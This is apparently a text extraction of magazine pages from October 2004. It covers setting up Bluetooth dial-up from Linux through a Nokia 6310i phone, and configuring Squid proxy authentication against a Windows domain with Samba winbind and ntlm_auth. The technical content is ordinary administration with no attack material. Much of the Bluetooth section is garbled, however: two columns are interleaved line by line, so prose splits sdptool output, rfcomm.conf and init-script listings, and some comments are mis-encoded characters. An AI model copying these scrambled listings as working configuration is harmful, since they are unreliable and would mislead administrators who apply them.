Как говорил один известный персонаж, «Все ходы у нас Service RecHandle: 0x10022
Service Class ID List:
записаны». И в случае чего можно будет запросто занять- "" (0x111f)
ся отладкой неработающего соединения. "Generic Audio" (0x1203)
Protocol Descriptor List:
Теперь было бы интересно узнать, какие сервисы Nokia "L2CAP" (0x0100)
6310i может нам предоставить. Для этого на компьютере "RFCOMM" (0x0003)
должен работать sdp-демон, который реализует протокол Channel: 13
Language Base Attr List:
Service Discovery Protocol. А вслед за ним необходимо за- code_ISO639: 0x656e
пустить утилиту sdptool, получающую данные от демона и encoding: 0x6a
base_offset: 0x100
показывающую их пользователю. Profile Descriptor List:
"" (0x111e)
# sdpd Version: 0x0100
# sdptool browse 00:02:EE:B6:6A:E5
Browsing 00:02:EE:B6:6A:E5 ... Service Name: Dial-up networking
Service Name: Fax Service RecHandle: 0x10027
Service RecHandle: 0x1001e Service Class ID List:
Service Class ID List: "Dialup Networking" (0x1103)
"Fax" (0x1111) "Generic Networking" (0x1201)
"Generic Telephony" (0x1204) Protocol Descriptor List:
Protocol Descriptor List: "L2CAP" (0x0100)
"L2CAP" (0x0100) "RFCOMM" (0x0003)
"RFCOMM" (0x0003) Channel: 1
Channel: 2 Language Base Attr List:
Language Base Attr List: code_ISO639: 0x656e
code_ISO639: 0x656e encoding: 0x6a
encoding: 0x6a base_offset: 0x100
base_offset: 0x100 Profile Descriptor List:
Profile Descriptor List: "Dialup Networking" (0x1103)
"Fax" (0x1111) Version: 0x0100
Version: 0x0100
Думаю, что для выхода в Интернет нам лучше всего ис-
Service Name: OBEX Object Push пользовать сервис под названием «Dialup Networking», при-
Service RecHandle: 0x1001f вязанный к каналу номер 1 (Channel: 1). Для того чтобы вос-
Service Class ID List:
"OBEX Object Push" (0x1105) пользоваться интересующим сервисом, нужно связать его
Protocol Descriptor List: с устройством rfcomm.
"L2CAP" (0x0100) Проверим, есть ли у нас в системе столь необходимые
"RFCOMM" (0x0003)
Channel: 9 устройства:
"OBEX" (0x0008)
Language Base Attr List: # ll /dev/rfcomm*
code_ISO639: 0x656e lrwxrwxrwx 1 root root 6 Aug 4 09:29 /dev/rfcomm0 -> ttyUB0
encoding: 0x6a lrwxrwxrwx 1 root root 6 Aug 4 09:29 /dev/rfcomm1 -> ttyUB1
base_offset: 0x100 lrwxrwxrwx 1 root root 6 Aug 4 09:29 /dev/rfcomm2 -> ttyUB2
Profile Descriptor List:
"OBEX Object Push" (0x1105) Для того чтобы получить возможность работать с устрой-
Version: 0x0100 ством rfcomm, как с обычным COM-портом, нужно привя-
Service Name: Audio Gateway
зать его к каналу, через который доступен интересный для
Service RecHandle: 0x10020 нас сервис. Как уже упоминалось выше, Dial-up Networking

26
 администрирование
в телефоне Nokia 6310i закреплен за первым каналом. В
устройствах от других производителей могут использовать-
ся номера каналов, отличающиеся от приведенных в этой
статье.
Привязать канал к rfcomm можно либо на постоянной ос-
нове с помощью команды bind, либо на один раз с помощью
команды connect. В первом случае привязка сохранится вне
зависимости от того, сколько раз мы соединялись с устрой-
ством, а во втором после окончания соединения привязка
будет разорвана. Привожу оба варианта:

# rfcomm bind rfcomm0 00:02:EE:B6:6A:E5 1

# rfcomm connect rfcomm0 00:02:EE:B6:6A:E5 1

После выполнения любой из этих команд нужно прове-

рить, правильно ли все работает. Делается это с помощью
вызова следующей команды:

# rfcomm show
rfcomm0: 00:02:EE:B6:6A:E5 channel 1 clean

Самые нетерпеливые могут присоединиться к устрой-

ству /dev/rfcomm0 программой minicom и управлять моде-
мом с помощью стандартных AT-команд. Я же предпочи-
таю пойти другим путем. Для дозвона к провайдеру будет
использоваться программа kppp. Впрочем, все желающие
могут использовать стандартный pppd. Это всего лишь дело Завершив настройку соединения, переходим на вклад-
вкуса, потому что kppp все равно запускает pppd. ку «Устройство» и изменяем данные, отображенные на ней,
Запустив kppp, воспользуемся кнопкой «Настроить», следующим образом.
затем выбираем вкладку соединения и жмем Создать →
Ручная настройка. Настраиваем все так, как показано на
следующих рисунках.

Выбираем только что созданное соединение, указав имя

пользователя и пароль, жмем «Подключиться».
Если все настроено правильно, то на дисплее телефо-
на должен появиться следующий запрос:

№10(23), октябрь 2004 27

 администрирование
Согласившись, вводим PIN-код, который в дальнейшем
будет использоваться для авторизации соединения с уст-
ройством tigroid.
Во время работы я столкнулся с такой проблемой. Не-
смотря на то что телефон признал в компьютере свою пару,
подключение не срабатывало. В этом случае рекомендует-
ся разрушить парность устройств, воспользоваться меню,
изображенными на следующих снимках. Затем, удалив
файл /etc/bluetooth/link_key, заново пройти процедуру ав-
торизации.

На экране компьютера появится аналогичный запрос на

ввод PIN-кода.

В случае если с авторизацией все хорошо, нужно по-

пробовать выполнить соединение с провайдером. На экра-
не телефона должны появляться следующие изображения.

Стоит отметить, что принятием кода занимается про-

грамма pin_helper, о которой мы говорили ранее. К сожа-
лению, не во всех дистрибутивах она работает гладко. Если
у вас дело обстоит именно так, то можно написать свой соб-
ственный pin_helper примерно такого содержания:

#!/bin/sh
echo "PIN:12345"

Даем ему исполняемые атрибуты и вписываем назва-

ние в /etc/bluetooth/hcid.conf. Проблем – как не бывало. В
случае если оба устройства опознают друг друга с помо-
щью одинакового PIN-кода, происходит соединение в пару.

Опробовав полученное соединение, вновь возвращаем-

ся к настройке системы.

Иначе получаем вот такое уведомление:

Если все прошло хорошо, то телефон начнет набирать

номер провайдера и попытается с ним соединиться. Кста-
ти, стоит сказать, что подобную процедуру ручной автори-
зации необходимо выполнить всего один раз. После этого
в файле /etc/bluetooth/link_key появится ключ соединения,
а телефон внесет компьютер по имени tigroid в список пар-
ных устройств. Впредь авторизация будет происходить ав-
томатически, не требуя нашего вмешательства.
Проверить это можно с помощью следующих меню.
Мы запускали всех демонов и привязывали устройства
вручную. Конечно, для настройки и отладки это вполне под-
ходит, но в реальной системе хотелось бы иметь немного
больше удобства. В этом нам поможет сервис bluetooth. Для
того чтобы автоматически привязывать нужный канал к
устройству rfcomm, вносим в файл /etc/rfcomm.conf следу-
ющие строчки:

28
 администрирование
rfcomm0 { Затем ищем блок строк, отвечающий за включение сер-
# Íóæíî ëè âûïîëíÿòü àâòîìàòè÷åñêóþ ïðèâÿçêó
висов:
bind yes;
HCID_ENABLE=true
# Àäðåñ óäàëåííîãî óñòðîéñòâà SDPD_ENABLE=true
device 00:02:EE:B6:6A:E5; HIDD_ENABLE=false
HID2HCI_ENABLE=false
# Íîìåð êàíàëà RFCOMM_ENABLE=true
channel 1; DUND_ENABLE=false
PAND_ENABLE=false
# Îïèñàíèå ñîåäèíåíèÿ
comment "Dial-up Networking";
}
И после него вставляем вот такую конструкцию:

После этого стоит всего лишь выполнить команды: if $HCID_ENABLE ; then

HCID_EXEC="`which $HCID_NAME || true`"
fi
# service bluetooth stop
# service bluetooth start if $SDPD_ENABLE ; then
SDPD_EXEC="`which $SDPD_NAME || true`"
И все нужные устройства будут подключены автомати- fi
чески. В принципе система работает, но при каждом запус- if $HIDD_ENABLE ; then
ке сервиса bluetooth на экранt появляются ошибки: HIDD_EXEC="`which $HIDD_NAME || true`"
fi
# service bluetooth start if $HID2HCI_ENABLE ; then
which: no hid2hci in (/sbin:/bin:/usr/sbin:/usr/bin) HID2HCI_EXEC="`which $HID2HCI_NAME || true`"
Starting Bluetooth subsystem: fi
Starting hcid service: [ DONE ]
Starting sdpd service: [ DONE ] if $RFCOMM_ENABLE ; then
Starting hidd service: Can't open HIDP control socket: Invalid argument [FAILED]
RFCOMM_EXEC="`which $RFCOMM_NAME || true`"
Starting rfcomm service: [ DONE ]
fi
Дело в том, что в моей системе нет bluetooth-мышей, if $DUND_ENABLE ; then
клавиатур и прочих HID-устройств, но скрипт упорно наста- PAND_EXEC="`which $PAND_NAME || true`"
fi
ивает на необходимости работать с ними. И это несмотря
на то, что HID отключен установкой переменных в значе- if $PAND_ENABLE ; then
DUND_EXEC="`which $DUND_NAME || true`"
ние false. fi

HIDD_ENABLE=false После этого проблемы должны исчезнуть. Думаю, что

HID2HCI_ENABLE=false
на этом наш сегодняшний разговор о bluetooth стоит за-
Видимо, придется немного подчистить мелкие недоче- вершить. Дайте мне знать, если вас заинтересовала дан-
ты автора скрипта /etc/init.d/bluetooth. ная тема. В случае необходимости я напишу продолжение
Все проблемы возникают оттого, что скрипт пытается этого материала. В нем будет рассказано о том, как, пользу-
искать местонахождение программ раньше, чем станет из- ясь созданным bluetooth-соединением, управлять различ-
вестно, нужны ли они пользователю. Для исправления оши- ными сервисами телефона и отправлять sms.
бок находим следующие строки и либо удаляем их, либо
комментируем: Литература:
1. Specification of the Bluetooth System», Volume 1: http://
HCID_EXEC="`which $HCID_NAME || true`" www.bluetooth.com/pdf/Bluetooth_11_Specifications_
SDPD_EXEC="`which $SDPD_NAME || true`"
HIDD_EXEC="`which $HIDD_NAME || true`" Book.pdf
2. Maxim Krasnyansky: Linux BlueZ Howto Bluetooth: http://
HID2HCI_EXEC="`which $HID2HCI_NAME || true`"
RFCOMM_EXEC="`which $RFCOMM_NAME || true`" bluez.sourceforge.net/howto/
3. Official Linux Bluetooth protocol stack: http://www.bluez.org/
PAND_EXEC="`which $PAND_NAME || true`"
DUND_EXEC="`which $DUND_NAME || true`" 4. Bluez user howto: http://www.hanscees.com

IPMonitor – помощник системного администратора

Когда ваш сервер не работал, вы будете знать с точностью до минуты.

Появился новый сервис, который ориентирован на людей, ответственных за бесперебойную работу интернет-серви-
са. Система разрабатывалась для мониторинга работы веб-сайта, но может тестировать любой сетевой сервис.
Программа, работающая на сервере http://ipmonitor.ru, раз в минуту пытается установить соединение с указанным
вами IP-адресом. Сообщения об изменении состояния цели мониторинга (работает/не работает) записываются в лог и
высылаются по почте. Использовав шлюз e-mail → SMS, который есть у любого оператора сотовой связи, можно полу-
чать сообщение на сотовый телефон.

№10(23), октябрь 2004 29

 администрирование
НАСТРОЙКА SQUID
ДЛЯ ИСПОЛЬЗОВАНИЯ АВТОРИЗАЦИИ
ИЗ ДОМЕНА WINDOWS 2000
Постановка задачи
Предположим, имеется компьютерная сеть на базе домена
Windows NT или 2000, выходящая в Интернет исключитель-
но через прокси-сервер, расположенный на компьютере под
управлением операционной системы FreeBSD. Рано или
поздно возникает необходимость контролировать доступ
пользователей прокси-сервера к различным обьектам. Пер-
вое, что приходит в голову в таких случаях – разделение
доступа по IP-адресам компьютеров. Этот способ достаточ-
но просто реализуется с помощью несложного набора ACL
в конфигурационном файле squid.conf, но он обладает од-
ним весьма существенным недостатком – невозможно без
привлечения дополнительных ресурсов однозначно сказать,
какой пользователь в данный момент имел доступ к данно-
му ресурсу. Более удобным для администратора является
способ, когда каждый пользователь идентифицируется и
получает доступ к прокси только при наличии действующей
регистрационной записи в домене Windows (и возможно,
только при вхождении в определенную группу домена). Ва-
рианты настроек прокси-сервера, обеспечивающие полу-
чение регистрационного имени пользователя, запросивше-
го данный ресурс, и будут рассмотрены в данной статье.
(Оставим пока в стороне вопрос о том, что делать с этой
информацией – расчет статистики загрузки канала и ото-
бражения ее – это тема для отдельной статьи). Для моде-
лирования ситуации использовалась следующая конфигу-
рация:
! Домен на базе Windows 2000 Server.
! Прокси-сервер Squid 2.5-STABLE6 на базе FreeBSD 4.10-
STABLE.
! Samba 2.2.11 и Samba 3.0.6.
30
РАШИД АЧИЛОВ
! Все программы собирались с помощью портов, в Makefile
которых при необходимости вносились изменения. Дан-
ные изменения не затрагивали каталоги для размеще-
ния файлов порта.
Все команды в данной статье запускаются от имени
пользователя root. Если для выполнения команды доста-
точно привилегий рядового пользователя, это оговарива-
ется заранее.
Squid 2.5 и Samba 2.2.x
Первый рассматриваемый вариант – предоставление дос-
тупа к прокси-серверу при условии наличия действующей
учетной записи в домене Windows с использованием паке-
та Samba 2.2.x. Версия Samba здесь имеет принципиаль-
ное значение, поскольку с различными версиями пакета
samba необходимо использовать различные варианты вне-
шних аутентификаторов для squid.
Для проверки имени и пароля пользователя, передан-
ных Squid, мы будем использовать аутентификаторы wb_
ntlmauth и wb_auth, которые собираются вместе со Squid,
если задать их сборку. Для задания сборки данных аутен-
тификаторов следует добавить «winbind» в строки --enable-
basic-auth-helpers=”список” и --enable-ntlm-auth-helpers=”спи-
сок” в строке CONFIGURE_ARGS порта squid. В последней
на данный момент версии порта (1.138 от 21.08.2004) эти
параметры заданы по умолчанию. Если имеются исходные
тексты Samba, то можно указать их расположение парамет-
ром --with-samba-sources=<полный путь>, например:
--with-samba-sources=/usr/ports/net/samba/work/samba-2.2.11

иначе Squid будет использовать часть исходных текстов
Samba, распространяемых вместе с ним. Если сборка вы-
полняется не с помощью портов, а самостоятельно (что
крайне не рекомендуется делать), то следует добавить к
строке запуска configure эти параметры:
./configure --enable-auth=”basic ntlm” ↵
--enable-basic-auth-helpers=”winbind” ↵
--enable-ntlm-auth-helpers=”winbind” ↵
... <äðóãèå ïàðàìåòðû ïîðòà, åñëè íåîáõîäèìû>
После сборки и установки порта в каталоге /usr/local/
libexec должны появиться файлы wb_ntlmauth и wb_auth.
Аутентификатор для проверки имени и пароля, передан-
ного от Squid, обращается к демону winbindd, который дол-
жен быть запущен на данном компьютере. Для обеспече-
ния работоспособности данной схемы Samba, в состав ко-
торой входит winbindd, должна быть собрана со следующи-
ми параметрами:
make WITH_WINBIND=yes WITH_WINBIND_AUTH_CHALLENGE=yes
Если сборка самбы выполняется не через порты, а са-
мостоятельно (что не рекомендуется делать), то к строке
запуска configure следует добавить следующие параметры:
./configure --with-winbind --with-winbind-auth-challenge ↵
... <äðóãèå ïàðàìåòðû ïîðòà, åñëè íàäî>
Данная строка задает только сборку Samba безотноси-
тельно наличия на компьютере Squid. Если Samba уже была
установлена и собиралась без указанных параметров, ее
необходимо пересобрать.
По окончании сборки и установки порта в каталоге /usr/
local/sbin должна появиться программа winbindd, а в ката-
логе /usr/local/bin – wbinfo, которая служит для «общения»
с winbindd и получения от него информации. После запуска
самбы следует проверить работоспособность winbindd сле-
дующим образом:
granch:[shelton] 101>wbinfo -p
Ping to winbindd succeeded on fd 3
granch:[shelton] 104>wbinfo -t
checking the trust secret via RPC calls succeeded
Первая команда проверяет, работает ли winbindd. Вто-
рая – что учетная запись компьютера, на котором запущен
winbindd, добавлена в домен и имеет доступ к базе данных
домена. Для выполнения данной команды достаточно прав
пользователя, имеющего доступ к каталогу /var/db/samba/
winbindd_privileged. Если вывод программ отличается от
приведенного, следует обратиться к документации по samba
для выяснения причины, почему winbindd неработоспосо-
бен, устранить эти причины и повторять тестирование до
тех пор, пока не будет получен успешный результат. Наи-
более общими причинами являются:
! winbindd не запущен (несмотря на всю тривиальность
данной причины);
! компьютер не включен в домен Windows, который ука-
зан в параметре workgroup конфигурационного файла
Samba (не выполнялась команда smbpasswd -j MYDOMAIN
для samba 2.x или net rpc join <type> -w MYDOMAIN для
samba 3.x).
№10(23), октябрь 2004
администрирование
Наконец вся предварительная работа выполнена, мож-
но переходить к настройке Squid.
В файле squid.conf после тега auth_param (для версии
2.5.STABLE6 это строка 1000) идет длинный-длинный ком-
ментарий к данному параметру. Там расписаны все пара-
метры для всех схем авторизации, а ниже всего этого опи-
сания (а оно достаточно объемное – почти полторы сотни
строк) идут строки с параметрами программ аутентифика-
ции, отмеченные символом «#» в первой позиции, распоз-
наваемым как признак комментария. В данных строках не
вписана только собственно программа. Сделано это наме-
ренно, для того чтобы человек, который возьмется настра-
ивать эти параметры, понимал, что он делает.
Для того, чтобы наша схема работала, убираем символ
«#» из первой позиции и изменяем следующие строки фай-
ла squd.conf:
auth_param ntlm program /usr/local/libexec/wb_ntlmauth
auth_param ntlm children 5
auth_param ntlm max_challenge_reuses 0
auth_param ntlm max_challenge_lifetime 2 minutes
auth_param basic program /usr/local/libexec/wb_auth
auth_param basic children 5
auth_param basic realm Squid proxy-caching web server
auth_param basic credentialsttl 2 hours
после чего необходимо будет перезапустить прокси-сервер.
Что мы сделали:
! первые четыре строки описывают хелпер аутентифи-
кации wb_ntlmauth, который предназначен для работы
с браузером Microsoft Internet Explorer, а также с дру-
гими браузерами, распознающими конструкции вида
MYDOMAIN\myusername (еще к браузерам такого типа
относятся Mozilla/Firefox);
! остальные строки описывают хелпер аутентификации
wb_auth, который предназначен для проверки имени и
пароля, передаваемого со стандартного ввода с помо-
щью winbindd. Это позволяет использовать любые бра-
узеры – как графические, так и нет (lynx, например).
Обращаю внимание на следующие моменты:
! Строки в конфигурационном файле должны стоять в
том же порядке, что и в примере, приведенном выше.
По умолчанию дело обстоит именно так. Обьясняется
это одним странным свойством браузера Microsoft
Internet Explorer – он способен использовать только
первый описанный хелпер. Если первым описать хел-
пер wb_auth, Explorer доступ к прокси-серверу получить
не сможет.
! Необходим будет полный перезапуск через останов
сервера и его последующий старт. Команды squid -k
reconfigure недостаточно, поскольку при изменении па-
раметров аутентификации squid выгружает и загружает
хелперы аутентификации самостоятельно.
Кроме того, необходимо изменить правила получения
доступа к прокси-серверу таким образом, чтобы доступ пре-
доставлялся только в случае, если пользователь ввел имя
и пароль действительной записи в домене Windows.
Для этого в файл squid.conf следует добавить следую-
щие строки:
31
 администрирование
acl NTLMauth proxy_auth REQUIRED
http_access allow NTLMauth
Первая строка создает правило, согласно которому:
! Доступом к прокси-серверу управляет внешняя програм-
ма (программы), описанная в секции auth_param (см.
выше описание данного параметра). Если какая-либо
из программ завершается с ошибкой, отсутствует или
дает отрицательный ответ, то вызывается следующая
по списку, пока не будут просмотрены все присутству-
ющие в файле squid.conf строки auth_param.
! Для доступа к прокси-серверу необходим положитель-
ный ответ от программы-аутентификатора (хелпера),
иначе доступ предоставлен не будет. Завершение с
ошибкой, отсутствие или отрицательный ответ всех хел-
перов считаются отрицательным результатом и являют-
ся основанием для отказа в доступе.
Вторая строка разрешает доступ к прокси только в том
случае, если проверка правила NTLMauth, описанного в
первой строке, завершилась успешно.
Проверяем.
Запустив любой браузер, кроме Internet Explorer, пыта-
емся посетить какой-нибудь сайт. Получаем запрос на ввод
имени и пароля. Вводим (для того чтобы не вводить его
постоянно в Mozilla/Konqueror, например, есть режим хра-
нения паролей, при котором во все последующие разы до-
статочно нажать «OK»). Получаем доступ к сайту. Смот-
рим файл регистрационного журнала access.log прокси-сер-
вера и видим в конце строки, там где всегда было пусто,
введенное нами имя пользователя.
Запускаем Internet Explorer. Пароль вводить не надо –
Internet Explorer обладает «неестественным» интеллектом
и передаст его сам. Получаем доступ к сайту. Смотрим файл
регистрационного журнала access.log прокси-сервера и
видим...
Здесь мы сталкиваемся с двумя вполне безобидными,
но способными поначалу озадачить особенностями Internet
Explorer – во-первых, автоматическая передача регистра-
ционного имени и пароля пользователя происходит только
на третий запрос бразуера, после того как он дважды по-
лучает в ответ: TCP_DENIED/407, а во-вторых, регистраци-
онное имя передается в форме MYDOMAIN\myusername, что
потребует потом его дальнейшей обработки, потому что
регистрационное имя, передаваемое прочими браузерами,
не содержит Windows-домена.
Squid 2.5 и Samba 3.x
Несколько усовершенствуем нашу систему. Все бы в ней
ничего, но есть как минимум один момент, который может
потребовать доработок. Он связан с тем, что Samba Team
официально прекращает поддержку ветки 2.2.х с 1 октяб-
ря 2004 г. для того, чтобы сосредоточить все усилия на вет-
ке 3.х и перспективной 4.х. Это означает то, что обнару-
женные ошибки исправляться не будут, вне зависимости
от их степени опасности. Поэтому мы заблаговременно от-
казываемся в нашей системе от Samba 2.2.11 и переходим
на Samba 3.х.
Samba 3.x – это новый продукт Samba team, который
содержит огромное количество изменений (и примерно та-
32
кое же количество ошибок) по сравнению с Samba 2.2.x.
Squid еще не умеет работать с winbindd-демоном от Samba
3.x, поэтому Samba Team поставляет собственную версию
хелпера аутентификации для использования его в Squid –
ntlm_auth. Поэтому при сборке Squid безразлично, что бу-
дет задано в качестве параметров --enable-basic-auth-helpers
и --enable-ntlm-auth-helpers. Для сборки Samba как обычно
следует указать:
make WITH_WINBIND=yes
при сборке через порты либо:
./configure --with-winbind ... <ïðî÷èå ïàðàìåòðû, åñëè íàäî>
После сборки порта в каталоге /usr/local/bin должен по-
явиться файл ntlm_auth. Для него существует руководство
(мануал) в отличие от тех хелперов, что поставляются вме-
сте со Squid, можете посмотреть, набрав man ntlm_auth.
Как обычно, сначала убеждаемся, что winbindd запущен
и Samba сконфигурирована нормально, запустив wbinfo -p
и wbinfo -t (пример вывода программ и рекомендации, что
делать, если вывод не совпадает, приведен выше).
Можно переходить к изменению конфигурационного
файла squid.conf. Находим строку, которую редактировали
в прошлый раз, и изменяем вот так:
auth_param ntlm program /usr/local/bin/ntlm_auth ↵
--helper-protocol=squid-2.5-ntlmssp
auth_param ntlm children 5
auth_param ntlm max_challenge_reuses 0
auth_param ntlm max_challenge_lifetime 2 minutes
auth_param basic program /usr/local/bin/ntlm_auth ↵
--helper-protocol=squid-2.5-basic
auth_param basic children 5
auth_param basic realm Squid proxy-caching web server
auth_param basic credentialsttl 2 hours
Более подробную информацию о параметрах хелпера
htlm_auth можно получить из команды man ntlm_auth.
Как обычно, следите за тем, чтобы ntlm_auth в /usr/local/
bin был из сборки Samba, потому что Squid тоже собирает
свой собственный хелпер ntlm_auth (--enable-ntlm-auth-
helpers=”SMB”). Но хелпер Squid не умеет работать с
winbindd, входящим в комплект Samba 3.x. И конечно, хел-
пер, обслуживающий запросы Internet Explorer, должен рас-
полагаться перед хелпером, принимающем пароль со стан-
дартного ввода.
Отличительной (и приятной) особенностью работы дан-
ного хелпера является то, что при общении с Internet Explorer
имя пользователя передается в лог без доменной части
(myusername вместо MYDOMAIN\myusername при взаимо-
действии с хелперами, входящими в комплект Squid).
Стоит отметить еще одну особенность данного хелпе-
ра – для нормальной работы ему необходим доступ к pipe
winbindd, который по умолчанию располагается в /var/db/
samba/winbindd_privileged. Собственно pipe имеет права
0777, но каталог, в котором он находится, имеет права 0750.
Для решения этой проблемы достаточно изменить груп-
пу пользователей каталога winbindd_privileged на squid:
chown root:squid /var/db/samba/winbindd_privileged

Squid 2.5, Samba и наличие
пользователей в определенной группе
Модифицируем нашу систему дальше. Сделаем так, чтобы
пользователь мог получить доступ к прокси-серверу, толь-
ко если его учетная запись находится в группе My Proxy.
Для решения этой проблемы можно использовать как стан-
дартные аутентификаторы прокси-сервера (ntlm_auth и
wbinfo_group), так и аутентификатор ntlm_auth из комплек-
та сборки Samba. Рассмотрим каждый вариант.
Использование аутентификаторов
из комплекта прокси-сервера
Для того чтобы использовать аутентификаторы прокси-сер-
вера вместе с Samba (версия не имеет значения), необхо-
димо использовать другие программы-хелперы.
Для использования хелперов из комплекта прокси-сер-
вера задача аутентификации разбивается на две части –
используется хелпер ntlm_auth и внешняя программа
wbinfo_group.pl, представляющая из себя скрипт на языке
Perl. Перестраиваем конфигурацию аутентификаторов сле-
дущим образом:
auth_param ntlm program /usr/local/libexec ↵
/ntlm_auth MY_DOMAIN\\dcone MY_DOMAIN\\dctwo
auth_param ntlm children 5
auth_param ntlm max_challenge_reuses 0
auth_param ntlm max_challenge_lifetime 2 minutes
auth_param basic program /usr/local/libexec/wb_auth
auth_param basic children 5
auth_param basic realm Squid proxy-caching web server
auth_param basic credentialsttl 2 hours
Здесь dcone и dctwo – соответственно первый и вто-
рой контроллеры домена (имеются в виду NetBIOS-имена).
Следует заметить, что здесь мы меняем только конфигура-
цию для браузеров, которые умеют работать с конструкци-
ями MY_DOMAIN\myname и не меняем конфигурацию для
прочих браузеров. Кроме того, в секцию external_acl_type
мы добавляем дополнительную внешнюю программу
wbinfo_ group.pl (для установки данной программы следует
указать:
--with-external-acl-helpers=”wbinfo_group”
в строке запуска configure при сборке прокси-сервера, пос-
ледняя версия Makefile в портах установит его по умолча-
нию) таким образом:
external_acl_type ntgroup concurrency=5 ↵
%LOGIN /usr/local/libexec/wbinfo_group.pl
Что мы сделали: задали использование внешней про-
граммы-аутентификатора, с именем ntgroup (будет исполь-
зоваться при задании ACL), пять одновременно работаю-
щих копий в памяти, передаваться ей будет регистрацион-
ное имя, в ответ программа должна вернуть OK или ERR, в
зависимости от проверяемого условия.
Кроме того, изменяем условие предоставления досту-
па к прокси-серверу на следующее:
acl NTDCgroup external ntgroup Internet
acl NTLMauth proxy_auth REQUIRED
http_access allow NTLMauth NTDCgroup
№10(23), октябрь 2004
администрирование
С условием NTLMauth мы уже знакомы – оно задает
представление доступа только в случае успешного возвра-
та от хелперов аутентификации. Условие NTDCgroup зада-
ет вызов внешней программы, описанной в условии ntgroup,
при этом в качестве параметра внешней программе пере-
дается имя группы, вхождение в которую должно быть про-
верено. В данном примере это группа Internet. Доступ к про-
кси будет предоставлен только в случае одновременного
выполнения обоих условий.
Достоинством данного метода является независимость
его от версии Samba – wb_ntlmauth и wbinfo_group работа-
ют путем передачи команд демону winbindd – можно спо-
койно перейти с версии Samba 2.х на версию 3.х и не заме-
тить момент перехода.
Использование аутентификаторов
из комплекта Samba (только Samba 3.x)
Поскольку хелперы прокси-сервера не умеют работать с
winbindd демоном из сборки Samba 3.x, рекомендуется от-
казаться от их применения и использовать хелпер ntlm_auth
из сборки прокси-сервера (не путать с одноименным хел-
пером из сборки Samba! Хелпер прокси-сервера обычно ле-
жит в /usr/local/libexec, а хелпер Samba – в /usr/local/bin).
Кроме того, использование wbinfo_group.pl имеет один от-
рицательный момент – это скрипт, он написан на языке Perl,
следовательно, в оперативной памяти постоянно находит-
ся некоторое количество копий процесса perl, интерпрети-
рующего скрипт. Отказ от wbinfo_group.pl позволит сокра-
тить объем требуемой памяти. Использование аутентифи-
каторов из комплекта Samba значительно проще: не нужно
никаких внешних программ, не нужно никаких дополнитель-
ных правил – сам хелпер ntlm_auth имеет параметр --require-
membership-of=”Group”. Поэтому возвращаем наше прави-
ло, регулирующее доступ к прокси-серверу, к виду, описан-
ному в разделе «Samba 2.5 и Samba 2.2.x».
http_access allow NTLMauth
и заменяем хелперы из поставки squid на хелпер ntlm_auth
из поставки samba следующим образом:
auth_param ntlm program /usr/local/bin/ntlm_auth ↵
--helper-protocol=squid-2.5-ntlmssp ↵
--require-membership-of="MY_DOMAIN+My Proxy"
auth_param ntlm children 5
auth_param ntlm max_challenge_reuses 0
auth_param ntlm max_challenge_lifetime 2 minutes
auth_param basic program /usr/local/bin/ntlm_auth ↵
--helper-protocol=squid-2.5-basic ↵
--require-membership-of="MY_DOMAIN+My Proxy"
auth_param basic children 5
auth_param basic realm Squid proxy-caching web server
auth_param basic credentialsttl 2 hours
Здесь «My Proxy» – группа, присутствие в которой дает пра-
во пользоваться прокси-сервером. На что следует обратить
внимание – в значении параметра --require-membership-of
задана запись «MY_DOMAIN+My Proxy». В этой записи «My
Proxy» – название группы, а знак «+» – это значение пара-
метра «winbind separator» из конфигурационного файла
Samba smb.conf. В сервере, на котором проводилось тес-
тирование, параметр задан следующим образом:
33
 администрирование
winbind separator = +
Если у вас используется другой символ, его следует
указывать вместо знака «+» (в противном случае хелпер
не сможет определить принадлежность к группе и пользо-
ватель не получит доступа к прокси в конечном итоге). Сле-
дует иметь в виду, что данное значение параметра winbind
separator не является значением по умолчанию для самбы.
По умолчанию значением является «\» (обратная косая чер-
та). Но использование этого символа в командах, переда-
ваемых в shell, как правило, чревато необходимостью «за-
щищать» его от того, чтобы shell не воспринял его как слу-
жебный, поэтому был выбран другой символ. Хотя, напри-
мер, man smb.conf не рекомендует использовать именно «+»
чтобы избежать возможных проблем с NIS.
Если какой-либо из приведенных
способов не работает
Отнюдь не факт, что любой описанный здесь метод зара-
ботает с первого раза. Мне приходилось немало проверять,
перепроверять и тестировать конфигурационные файлы,
прежде чем начинал работать какой-либо из методов, хотя
в конечном итоге работали все методы. Если какой-либо
браузер (Mozilla, например, но не Internet Explorer) запра-
шивает пароль и не реагирует как положено на правиль-
ный, следует:
! Убедиться, что пароль введен правильно.
! Посмотреть лог cache.log в каталоге логов прокси-сер-
вера – хелперы выводят сообщения об ошибках туда.
! Проверить правильность написания путей в правилах
задания хелперов.
! Проверить наличие самих хелперов по указанным пу-
тям и достаточность прав на запуск хелперов из-под
пользователя, от имени которого работает прокси-сер-
вер (обычно это squid из группы squid).
! Если хелперы запускаются, следует обратить внимание
на моменты их запуска – если ntlm_auth, например, не
может установить связь с контроллером домена, он со-
общит об этом.
! Если используются хелперы на базе winbindd, следует
проверить работоспособность winbindd-демона (коман-
ды приводились выше).
! Если задействован хелпер ntlm_auth из поставки Samba –
его можно запустить в режиме отладки с консоли, при-
казав выводить максимально подробную отладочную ин-
формацию. В случае успешного запуска следует ввес-
ти через пробел имя и пароль пользователя, как пока-
зано ниже. Для выполнения данной команды достаточ-
но прав пользователя, имеющего доступ к каталогу /var/
db/samba/winbindd_privileged.
> ntlm_auth --helper-protocol=squid-2.5-basic
--require-membership-of=”MY_DOMAIN+My Proxy” -d10 -l /tmp
[2004/08/29 23:15:22, 5] lib/debug.c:debug_dump_status(367)
INFO: Current debug levels:
all: True/10
tdb: False/0
printdrivers: False/0
lanman: False/0
smb: False/0
rpc_parse: False/0
rpc_srv: False/0
34
rpc_cli: False/0
passdb: False/0
sam: False/0
auth: False/0
winbind: False/0
vfs: False/0
idmap: False/0
quota: False/0
acls: False/0
В ответ на запрос программы вводим имя пользовате-
ля testuser, пароль 123456.
[2004/08/29 23:16:21, 10] utils/ntlm_auth.c:manage_squid_request(1621)
Got 'testuser 123456' from squid (length: 15).
[2004/08/29 23:16:21, 3] utils/ntlm_auth.c:check_plaintext_auth(292)
NT_STATUS_OK: Success (0x0)
OK
Всегда используйте для тестирования только подобных
«пользователей», потому что пароль виден на консоли,
а также может остаться в файлах .history, .bash_history
или .mc/history!
! Проверить права доступа на каталог /var/db/samba/win
bindd_privileged, если используется хелпер ntlm_auth из
поставки Samba. При недостаточных правах хелпер мо-
жет выдавать в файл регистрационного журнала cache.log
сообщения, из которых совершенно невозможно понять,
чего ему не хватает для нормальной работы.
! При большом количестве запросов следует пропорцио-
